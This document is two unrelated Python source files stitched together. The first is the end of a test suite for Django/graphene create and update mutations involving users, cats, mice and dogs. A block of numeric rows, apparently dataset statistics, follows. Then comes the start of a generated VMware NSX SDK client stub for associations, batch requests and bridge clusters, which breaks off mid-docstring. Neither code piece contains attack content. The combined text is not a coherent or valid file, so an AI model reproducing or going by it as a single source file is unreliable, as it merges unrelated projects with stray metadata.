                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"remove": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        # Attach five cats so there is something to remove.
        owned_cats = CatFactory.create_batch(5)
        user.cats.set(owned_cats)
        self.assertEqual(user.cats.all().count(), 5)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(
                    user, catsRemove=[cat.id for cat in owned_cats]
                ),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.cats.all().count(), 0)

    def test_many_to_one_extras__remove_nullable_field__removes_by_id(self):
        """Removing from a relation with a nullable foreign key also works by ID."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"mice": {"remove": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        # Attach five mice (nullable `keeper` FK) so there is something to remove.
        kept_mice = MouseFactory.create_batch(5, keeper=user)
        user.mice.set(kept_mice)
        self.assertEqual(user.mice.all().count(), 5)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(
                    user, miceRemove=[mouse.id for mouse in kept_mice]
                ),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.mice.all().count(), 0)
class TestCreateMutationManyToOneExtras(TestCase):
    """Tests for DjangoCreateMutation configured with `many_to_one_extras`."""

    # All tests in this class issue the same create mutation document.
    CREATE_USER_MUTATION = """
        mutation CreateUser(
            $input: CreateUserInput!
        ){
            createUser(input: $input){
                user{
                    id
                }
            }
        }
    """

    @staticmethod
    def _execute(schema, input_payload, user):
        """Run the shared create mutation with an authenticated context."""
        return schema.execute(
            TestCreateMutationManyToOneExtras.CREATE_USER_MUTATION,
            variables={"input": input_payload},
            context=Dict(user=user),
        )

    @staticmethod
    def _input_for(user, **extra):
        """Build the base `input` payload for *user*, merged with *extra* keys."""
        payload = {
            "username": user.username,
            "firstName": user.first_name,
            "lastName": user.last_name,
            "email": user.email,
        }
        payload.update(extra)
        return payload

    def test_many_to_one_extras__auto_calling_mutation_with_setting_field__does_nothing(
        self,
    ):
        """An `exact: auto` extra left unset in the input creates no related rows."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateUserMutation(DjangoCreateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"exact": {"type": "auto"}}}

        class Mutations(graphene.ObjectType):
            create_user = CreateUserMutation.Field()

        user = UserFactory.build()
        schema = Schema(mutation=Mutations)

        result = self._execute(schema, self._input_for(user), user)
        self.assertIsNone(result.errors)

        data = Dict(result.data)
        created = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
        self.assertEqual(created.cats.all().count(), 0)

    def test_many_to_one_extras__set_exact_by_id__sets_by_id(self):
        """An `exact: ID` extra attaches the given related objects at creation."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateUserMutation(DjangoCreateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"exact": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            create_user = CreateUserMutation.Field()

        user = UserFactory.build()
        existing_cats = CatFactory.create_batch(5)
        schema = Schema(mutation=Mutations)

        result = self._execute(
            schema,
            self._input_for(user, cats=[cat.id for cat in existing_cats]),
            user,
        )
        self.assertIsNone(result.errors)

        data = Dict(result.data)
        created = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
        self.assertEqual(created.cats.all().count(), 5)

    def test_many_to_one_extras__add_by_id__adds_by_id(self):
        """An `add: ID` extra attaches the given related objects at creation."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateUserMutation(DjangoCreateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"add": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            create_user = CreateUserMutation.Field()

        user = UserFactory.build()
        existing_cats = CatFactory.create_batch(5)
        schema = Schema(mutation=Mutations)

        result = self._execute(
            schema,
            self._input_for(user, catsAdd=[cat.id for cat in existing_cats]),
            user,
        )
        self.assertIsNone(result.errors)

        data = Dict(result.data)
        created = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
        self.assertEqual(created.cats.all().count(), 5)

    def test_many_to_one_extras__add_by_input__adds_by_input(self):
        """An `add: auto` extra creates new related objects from nested input."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateCatMutation(DjangoCreateMutation):
            class Meta:
                model = Cat

        class CreateUserMutation(DjangoCreateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"add": {"type": "auto"}}}

        class Mutations(graphene.ObjectType):
            create_cat = CreateCatMutation.Field()
            create_user = CreateUserMutation.Field()

        user = UserFactory.build()
        schema = Schema(mutation=Mutations)

        result = self._execute(
            schema,
            self._input_for(
                user, catsAdd=[{"name": "Cat Damon"} for _ in range(5)]
            ),
            user,
        )
        self.assertIsNone(result.errors)

        data = Dict(result.data)
        created = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
        self.assertEqual(created.cats.all().count(), 5)
class TestUpdateWithOneToOneField(TestCase):
    """Tests for DjangoUpdateMutation configured with `one_to_one_extras`."""

    def test__one_to_one_relation_exists__updates_specified_fields(self):
        """Updating through a forward one-to-one extra modifies the related row."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateDogMutation(DjangoUpdateMutation):
            class Meta:
                model = Dog
                one_to_one_extras = {"registration": {"type": "auto"}}

        class Mutations(graphene.ObjectType):
            update_dog = UpdateDogMutation.Field()

        user = UserFactory.create()
        dog = DogFactory.create()
        DogRegistration.objects.create(dog=dog, registration_number="1234")

        schema = Schema(mutation=Mutations)
        mutation = """
            mutation UpdateDog(
                $id: ID!,
                $input: UpdateDogInput!
            ){
                updateDog(id: $id, input: $input){
                    dog{
                        id
                        registration{
                            id
                            registrationNumber
                        }
                    }
                }
            }
        """
        result = schema.execute(
            mutation,
            variables={
                "id": to_global_id("DogNode", dog.id),
                "input": {
                    "name": dog.name,
                    "breed": dog.breed,
                    "tag": dog.tag,
                    "owner": to_global_id("UserNode", dog.owner.id),
                    "registration": {"registrationNumber": "12345"},
                },
            },
            context=Dict(user=user),
        )
        # Removed leftover debug `print(result)` and a duplicated
        # `assertIsNone(result.errors)` assertion.
        self.assertIsNone(result.errors)
        data = Dict(result.data)
        self.assertEqual("12345", data.updateDog.dog.registration.registrationNumber)

        # Load from database
        dog.refresh_from_db()
        self.assertEqual(dog.registration.registration_number, "12345")

    def test__reverse_one_to_one_exists__updates_specified_fields(self):
        """Updating through a reverse one-to-one extra modifies the related row."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateDogRegistrationMutation(DjangoUpdateMutation):
            class Meta:
                model = DogRegistration
                one_to_one_extras = {"dog": {"type": "auto"}}

        class Mutations(graphene.ObjectType):
            update_dog_registration = UpdateDogRegistrationMutation.Field()

        user = UserFactory.create()
        dog = DogFactory.create(breed="HUSKY")
        dog_registration = DogRegistration.objects.create(
            dog=dog, registration_number="1234"
        )

        schema = Schema(mutation=Mutations)
        mutation = """
            mutation UpdateDogRegistration(
                $id: ID!,
                $input: UpdateDogRegistrationInput!
            ){
                updateDogRegistration(id: $id, input: $input){
                    dogRegistration{
                        id
                        registrationNumber
                        dog{
                            id
                            breed
                        }
                    }
                }
            }
        """
        result = schema.execute(
            mutation,
            variables={
                "id": to_global_id("DogRegistrationNode", dog_registration.id),
                "input": {
                    "registrationNumber": dog_registration.registration_number,
                    "dog": {
                        "name": dog.name,
                        "breed": "LABRADOR",
                        "tag": dog.tag,
                        "owner": to_global_id("UserNode", dog.owner.id),
                    },
                },
            },
            context=Dict(user=user),
        )
        self.assertIsNone(result.errors)
        data = Dict(result.data)
        self.assertEqual(
            "LABRADOR", data.updateDogRegistration.dogRegistration.dog.breed
        )

        # Load from database
        dog_registration.refresh_from_db()
        dog.refresh_from_db()
        self.assertEqual(dog.breed, "LABRADOR")
class TestCreateWithOneToOneField(TestCase):
    """Tests for DjangoCreateMutation configured with `one_to_one_extras`."""

    def test__one_to_one_relation_exists__creates_specified_fields(self):
        """Creating through a forward one-to-one extra creates the related row."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateDogMutation(DjangoCreateMutation):
            class Meta:
                model = Dog
                one_to_one_extras = {"registration": {"type": "auto"}}

        class Mutations(graphene.ObjectType):
            create_dog = CreateDogMutation.Field()

        user = UserFactory.create()
        schema = Schema(mutation=Mutations)
        mutation = """
            mutation CreateDog(
                $input: CreateDogInput!
            ){
                createDog(input: $input){
                    dog{
                        id
                        registration{
                            id
                            registrationNumber
                        }
                    }
                }
            }
        """
        result = schema.execute(
            mutation,
            variables={
                "input": {
                    "name": "Sparky",
                    "breed": "HUSKY",
                    "tag": "1234",
                    "owner": to_global_id("UserNode", user.id),
                    "registration": {"registrationNumber": "12345"},
                },
            },
            context=Dict(user=user),
        )
        # Removed a duplicated `assertIsNone(result.errors)` assertion.
        self.assertIsNone(result.errors)
        data = Dict(result.data)
        self.assertEqual("12345", data.createDog.dog.registration.registrationNumber)

        # Load from database
        dog = Dog.objects.get(pk=disambiguate_id(data.createDog.dog.id))
        registration = getattr(dog, "registration", None)
        self.assertIsNotNone(registration)
        self.assertEqual(registration.registration_number, "12345")

    def test__reverse_one_to_one_exists__updates_specified_fields(self):
        """Creating through a reverse one-to-one extra creates the related row."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateDogRegistrationMutation(DjangoCreateMutation):
            class Meta:
                model = DogRegistration
                one_to_one_extras = {"dog": {"type": "auto"}}

        class Mutations(graphene.ObjectType):
            create_dog_registration = CreateDogRegistrationMutation.Field()

        user = UserFactory.create()
        schema = Schema(mutation=Mutations)
        mutation = """
            mutation CreateDogRegistration(
                $input: CreateDogRegistrationInput!
            ){
                createDogRegistration(input: $input){
                    dogRegistration{
                        id
                        registrationNumber
                        dog{
                            id
                            name
                            tag
                            breed
                        }
                    }
                }
            }
        """
        result = schema.execute(
            mutation,
            variables={
                "input": {
                    "registrationNumber": "12345",
                    "dog": {
                        "name": "Sparky",
                        "breed": "LABRADOR",
                        "tag": "1234",
                        "owner": user.id,
                    },
                },
            },
            context=Dict(user=user),
        )
        self.assertIsNone(result.errors)
        data = Dict(result.data)

        dog_registration = data.createDogRegistration.dogRegistration
        dog = data.createDogRegistration.dogRegistration.dog
        self.assertEqual("Sparky", dog.name)
        self.assertEqual("LABRADOR", dog.breed)
        self.assertEqual("1234", dog.tag)
        self.assertEqual("12345", dog_registration.registrationNumber)

        # Load from database
        dog_registration = DogRegistration.objects.get(
            pk=disambiguate_id(dog_registration.id)
        )
        dog = getattr(dog_registration, "dog", None)
        self.assertIsNotNone(dog)
        self.assertEqual(dog.name, "Sparky")
        self.assertEqual(dog.tag, "1234")
class TestCreateWithPlainManyToOneRelation(TestCase):
    """Tests for DjangoCreateMutation with a plain (non-extras) many-to-one field."""

    def test__many_to_one_relation_exists__creates_specified_fields(self):
        """Passing related-object global IDs attaches them on creation."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateUserMutation(DjangoCreateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)

        class Mutations(graphene.ObjectType):
            create_user = CreateUserMutation.Field()

        user = UserFactory.create()
        cat = CatFactory.create()
        schema = Schema(mutation=Mutations)
        mutation = """
            mutation CreateUser(
                $input: CreateUserInput!
            ){
                createUser(input: $input){
                    user{
                        id
                        cats{
                            edges{
                                node{
                                    id
                                }
                            }
                        }
                    }
                }
            }
        """
        result = schema.execute(
            mutation,
            variables={
                "input": {
                    "username": "john",
                    "email": "test@example.com",
                    "firstName": "John",
                    "lastName": "Doe",
                    "cats": [to_global_id("CatNode", cat.id)],
                },
            },
            context=Dict(user=user),
        )
        # Removed a duplicated `assertIsNone(result.errors)` assertion.
        self.assertIsNone(result.errors)
        data = Dict(result.data)
        self.assertEqual(
            to_global_id("CatNode", cat.id), data.createUser.user.cats.edges[0].node.id
        )

        new_user = User.objects.get(pk=disambiguate_id(data.createUser.user.id))
        # Load from database
        cat.refresh_from_db()
        self.assertEqual(cat, new_user.cats.first())
class TestCreateWithPlainManyToManyRelation(TestCase):
    """Tests for DjangoCreateMutation with a plain (non-extras) many-to-many field."""

    def test__many_to_one_relation_exists__creates_specified_fields(self):
        """Passing related-object global IDs attaches them on creation."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateDogMutation(DjangoCreateMutation):
            class Meta:
                model = Dog

        class Mutations(graphene.ObjectType):
            create_dog = CreateDogMutation.Field()

        user = UserFactory.create()
        cat = CatFactory.create()
        schema = Schema(mutation=Mutations)
        mutation = """
            mutation CreateDog(
                $input: CreateDogInput!
            ){
                createDog(input: $input){
                    dog{
                        id
                        enemies{
                            edges{
                                node{
                                    id
                                }
                            }
                        }
                    }
                }
            }
        """
        result = schema.execute(
            mutation,
            variables={
                "input": {
                    "name": "Sparky",
                    "breed": "HUSKY",
                    "tag": "1234",
                    "owner": to_global_id("UserNode", user.id),
                    "enemies": [to_global_id("CatNode", cat.id)],
                },
            },
            context=Dict(user=user),
        )
        # Removed a duplicated `assertIsNone(result.errors)` assertion.
        self.assertIsNone(result.errors)
        data = Dict(result.data)
        self.assertEqual(
            to_global_id("CatNode", cat.id), data.createDog.dog.enemies.edges[0].node.id
        )

        new_dog = Dog.objects.get(pk=disambiguate_id(data.createDog.dog.id))
        # Load from database
        cat.refresh_from_db()
        self.assertEqual(cat, new_dog.enemies.first())
| 31.44511
| 88
| 0.492748
| 5,115
| 63,016
| 5.906549
| 0.050049
| 0.021084
| 0.022177
| 0.026811
| 0.900172
| 0.890408
| 0.882861
| 0.869059
| 0.857375
| 0.848967
| 0
| 0.00373
| 0.408674
| 63,016
| 2,003
| 89
| 31.460809
| 0.807047
| 0.048638
| 0
| 0.75169
| 0
| 0
| 0.23386
| 0.002523
| 0
| 0
| 0
| 0
| 0.061463
| 1
| 0.027658
| false
| 0.008605
| 0.028888
| 0.002459
| 0.138906
| 0.000615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85ac97b749f998cc27ba414e8130b0b3bc95b327
| 862,532
|
py
|
Python
|
com/vmware/nsx_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
com/vmware/nsx_client.py
|
adammillerio/vsphere-automation-sdk-python
|
c07e1be98615201139b26c28db3aa584c4254b66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Associations(VapiInterface):
    """
    vAPI service client for ``com.vmware.nsx.associations``: lists resources
    associated with a given resource.
    """

    # Accepted values for the ``associatedResourceType`` query parameter.
    LIST_ASSOCIATED_RESOURCE_TYPE_NSGROUP = "NSGroup"
    """
    Possible value for ``associatedResourceType`` of method
    :func:`Associations.list`.
    """
    # Accepted values for the ``resourceType`` query parameter.
    LIST_RESOURCE_TYPE_NSGROUP = "NSGroup"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_IPSET = "IPSet"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_MACSET = "MACSet"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_LOGICALSWITCH = "LogicalSwitch"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_LOGICALPORT = "LogicalPort"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_VIRTUALMACHINE = "VirtualMachine"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_DIRECTORYGROUP = "DirectoryGroup"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_VIRTUALNETWORKINTERFACE = "VirtualNetworkInterface"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    LIST_RESOURCE_TYPE_TRANSPORTNODE = "TransportNode"
    """
    Possible value for ``resourceType`` of method :func:`Associations.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.associations'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _AssociationsStub)
        self._VAPI_OPERATION_IDS = {}

    def list(self,
             associated_resource_type,
             resource_id,
             resource_type,
             cursor=None,
             fetch_ancestors=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns information about resources that are associated with the given
        resource. The id and type of the source resource, and the type of the
        associated resources to fetch, are all passed as query parameters.

        :type  associated_resource_type: :class:`str`
        :param associated_resource_type: Resource type valid for use as target in association API (required)
        :type  resource_id: :class:`str`
        :param resource_id: The resource for which associated resources are to be fetched
            (required)
        :type  resource_type: :class:`str`
        :param resource_type: Resource type valid for use as source in association API (required)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for fetching the next page of records (optional)
        :type  fetch_ancestors: :class:`bool` or ``None``
        :param fetch_ancestors: Fetch the complete list of associated resources considering
            containment and nesting (optional, default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields to include in the result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.AssociationListResult`
        :return: com.vmware.nsx.model.AssociationListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # Collect the operation arguments before dispatching to the stub.
        operation_args = {
            'associated_resource_type': associated_resource_type,
            'resource_id': resource_id,
            'resource_type': resource_type,
            'cursor': cursor,
            'fetch_ancestors': fetch_ancestors,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', operation_args)
class Batch(VapiInterface):
    """
    vAPI service client for ``com.vmware.nsx.batch``: submits several logical
    HTTP requests as one batched API call.
    """

    _VAPI_SERVICE_ID = 'com.vmware.nsx.batch'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _BatchStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self,
               batch_request,
               atomic=None,
               ):
        """
        Enables you to make multiple API requests using a single request. The
        batch API takes in an array of logical HTTP requests represented as
        JSON arrays. Each request has a method (GET, PUT, POST, or DELETE), a
        relative_url (the portion of the URL after https://<nsx-mgr>/api/),
        an optional headers array (corresponding to HTTP headers) and an
        optional body (for POST and PUT requests). The response is an array of
        logical HTTP responses, each carrying a status code, an optional
        headers array and an optional JSON-encoded body.

        :type  batch_request: :class:`com.vmware.nsx.model_client.BatchRequest`
        :param batch_request: (required)
        :type  atomic: :class:`bool` or ``None``
        :param atomic: transactional atomicity for the batch of requests embedded in the
            batch list (optional, default to false)
        :rtype: :class:`com.vmware.nsx.model_client.BatchResponse`
        :return: com.vmware.nsx.model.BatchResponse
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        operation_args = {
            'batch_request': batch_request,
            'atomic': atomic,
        }
        return self._invoke('create', operation_args)
class BridgeClusters(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.bridge_clusters'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BridgeClustersStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
bridge_cluster,
):
"""
Creates a bridge cluster. It is collection of transport nodes that will
do the bridging for overlay network to vlan networks. Bridge cluster
may have one or more transport nodes
:type bridge_cluster: :class:`com.vmware.nsx.model_client.BridgeCluster`
:param bridge_cluster: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeCluster`
:return: com.vmware.nsx.model.BridgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'bridge_cluster': bridge_cluster,
})
def delete(self,
bridgecluster_id,
):
"""
Removes the specified Bridge Cluster.
:type bridgecluster_id: :class:`str`
:param bridgecluster_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'bridgecluster_id': bridgecluster_id,
})
def get(self,
bridgecluster_id,
):
"""
Returns information about a specified bridge cluster.
:type bridgecluster_id: :class:`str`
:param bridgecluster_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.BridgeCluster`
:return: com.vmware.nsx.model.BridgeCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'bridgecluster_id': bridgecluster_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all configured bridge clusters
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.BridgeClusterListResult`
:return: com.vmware.nsx.model.BridgeClusterListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
    def update(self,
               bridgecluster_id,
               bridge_cluster,
               ):
        """
        Modifies an existing bridge cluster. One or more transport nodes can
        be added or removed from the bridge cluster using this API.

        :type bridgecluster_id: :class:`str`
        :param bridgecluster_id: Identifier of the bridge cluster to modify
            (required)
        :type bridge_cluster: :class:`com.vmware.nsx.model_client.BridgeCluster`
        :param bridge_cluster: Full replacement bridge cluster configuration
            (required)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeCluster`
        :return: com.vmware.nsx.model.BridgeCluster
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('update',
                            {
                            'bridgecluster_id': bridgecluster_id,
                            'bridge_cluster': bridge_cluster,
                            })
class BridgeEndpointProfiles(VapiInterface):
    """
    Generated API bindings for the
    ``com.vmware.nsx.bridge_endpoint_profiles`` service. Provides CRUD
    operations on bridge endpoint profiles; every method builds a parameter
    dictionary and forwards the call to the server via ``self._invoke``.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.bridge_endpoint_profiles'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _BridgeEndpointProfilesStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               bridge_endpoint_profile,
               ):
        """
        Creates a Bridge Endpoint Profile. Profile contains edge cluster id,
        indexes of the member nodes, failover mode and high availability mode
        for a Bridge EndPoint

        :type bridge_endpoint_profile: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
        :param bridge_endpoint_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.BridgeEndpointProfile`
        :return: com.vmware.nsx.model.BridgeEndpointProfile
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('create',
                            {
                            'bridge_endpoint_profile': bridge_endpoint_profile,
                            })
    def delete(self,
               bridgeendpointprofile_id,
               ):
        """
        Deletes the specified Bridge Endpoint Profile.

        :type bridgeendpointprofile_id: :class:`str`
        :param bridgeendpointprofile_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        return self._invoke('delete',
                            {
                            'bridgeendpointprofile_id': bridgeendpointprofile_id,
                            })
    def get(self,
            bridgeendpointprofile_id,
            ):
        """
        Returns information about a specified bridge endpoint profile.

        :type bridgeendpointprofile_id: :class:`str`
        :param bridgeendpointprofile_id: (required)
